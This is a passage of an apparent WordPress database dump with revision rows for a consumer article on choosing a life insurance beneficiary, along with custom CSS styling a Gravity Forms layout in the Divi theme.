insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary. In fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:38:39','2023-03-13 14:38:39','',278,'http://cmdev-site1.com/?p=286',0,'revision','',0),(287,3,'2023-03-13 14:38:56','2023-03-13 14:38:56','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary. In fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:38:56','2023-03-13 14:38:56','',278,'http://cmdev-site1.com/?p=287',0,'revision','',0),(288,3,'2023-03-13 14:39:33','2023-03-13 14:39:33','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary.\r\n\r\nIn fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier. For more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:39:33','2023-03-13 14:39:33','',278,'http://cmdev-site1.com/?p=288',0,'revision','',0),(289,3,'2023-03-13 14:39:50','2023-03-13 14:39:50','<h2><span style=\"color: #ffffff;\">-</span>\r\n<strong>What is a Beneficiary?</strong></h2>\r\nIn the world of insurance, a life insurance beneficiary is the person, people, or organization receiving your death benefit in the event that you die while your policy is active.\r\n\r\nThis recipient can be a spouse, child, friend, or charity.\r\n<h2><strong>Who Can be a Beneficiary?</strong></h2>\r\nGenerally speaking, no one can tell you who your beneficiary should be. A beneficiary can be a person, charity, business, or trust. In the event the beneficiary is a person, you can choose a spouse, relative, friend, or anyone else you happen to know. You may also choose more than one beneficiary.\r\n\r\nHowever, you’ll want to pay particular attention to certain regulations if you live in a common property state like Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, or Wisconsin.\r\n\r\nIn these states, there might be insurance beneficiary rules that require your spouse to waive their rights as beneficiary before you name another person or organization as your life insurance beneficiary.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h2><strong>5 Tips for Choosing a Life Insurance Beneficiary</strong></h2>\r\nChoosing a beneficiary doesn’t have to be difficult. If you follow these five tips, you’ll be on the right track to selecting the perfect life insurance beneficiary for you.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3><strong>1. Keep the purpose of the policy in mind</strong></h3>\r\nThe reasons you have for purchasing life insurance will usually be a pretty good guide when it comes to choosing your beneficiary.\r\n\r\nFor example, if you want to protect your family, consider choosing your spouse or child. If you want to preserve your business, consider choosing your business partner.\r\n<h3>\r\n<strong>2. Know your options</strong></h3>\r\nA lot of people think they can only choose a spouse or children as their beneficiary, but that isn’t entirely true. Get to know your options; you may find the right beneficiary outside your immediate circle.\r\n<h3>\r\n<strong>3. Have a beneficiary backup</strong></h3>\r\nEven if your beneficiary knows they’re in your life insurance policy, you may have trouble reaching them when needed.\r\n\r\nMake sure your attorney has their information, and if your beneficiary can’t be contacted at your time of death, make sure you have a backup beneficiary ready, ensuring your death benefits go to the right place.\r\n<h3>\r\n<strong>4. Keep your beneficiaries up-to-date</strong></h3>\r\nOne of the biggest oversights with life insurance policies is not keeping the beneficiaries up to date.\r\n\r\nBe sure to keep your insurance provider and attorney updated with your beneficiary’s most recent contact information and mailing address, make sure to inform your attorney and insurance provider any time it changes.\r\n<h3>\r\n<strong>5. Avoid designating a minor as a beneficiary</strong></h3>\r\nYou know those state regulations we talked about earlier? They can make matters infinitely more difficult when designating a minor as a beneficiary.\r\n\r\nIn fact, some states don’t allow minors to receive the full amount of benefits from life insurance proceeds – or any proceeds at all.\r\n\r\nOne way to avoid this is by setting up a trust for your child or designating an adult to oversee the distribution of funds from the death benefit to your child.\r\n\r\nUnderstanding who can be a life insurance beneficiary and how to choose one can help make one of the most stressful aspects of your life insurance journey much easier.\r\n\r\nFor more information on beneficiary rules and regulations in your state, contact a licensed insurance agent.','Can A Life Insurance Beneficiary Be Anyone?','','inherit','closed','closed','','278-revision-v1','','','2023-03-13 14:39:50','2023-03-13 14:39:50','',278,'http://cmdev-site1.com/?p=289',0,'revision','',0),(290,1,'2023-03-13 14:59:11','2023-03-13 14:59:11','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 14:59:11','2023-03-13 14:59:11','',35,'http://cmdev-site1.com/?p=290',0,'revision','',0),(291,1,'2023-03-13 15:00:54','2023-03-13 15:00:54','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 15:00:54','2023-03-13 15:00:54','',35,'http://cmdev-site1.com/?p=291',0,'revision','',0),(292,1,'2023-03-13 15:06:12','2023-03-13 15:06:12','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 15:06:12','2023-03-13 15:06:12','',35,'http://cmdev-site1.com/?p=292',0,'revision','',0),(293,1,'2023-03-13 15:08:39','2023-03-13 15:08:39','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-13 15:08:39','2023-03-13 15:08:39','',35,'http://cmdev-site1.com/?p=293',0,'revision','',0),(294,1,'2023-03-13 15:09:22','2023-03-13 15:09:22','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box 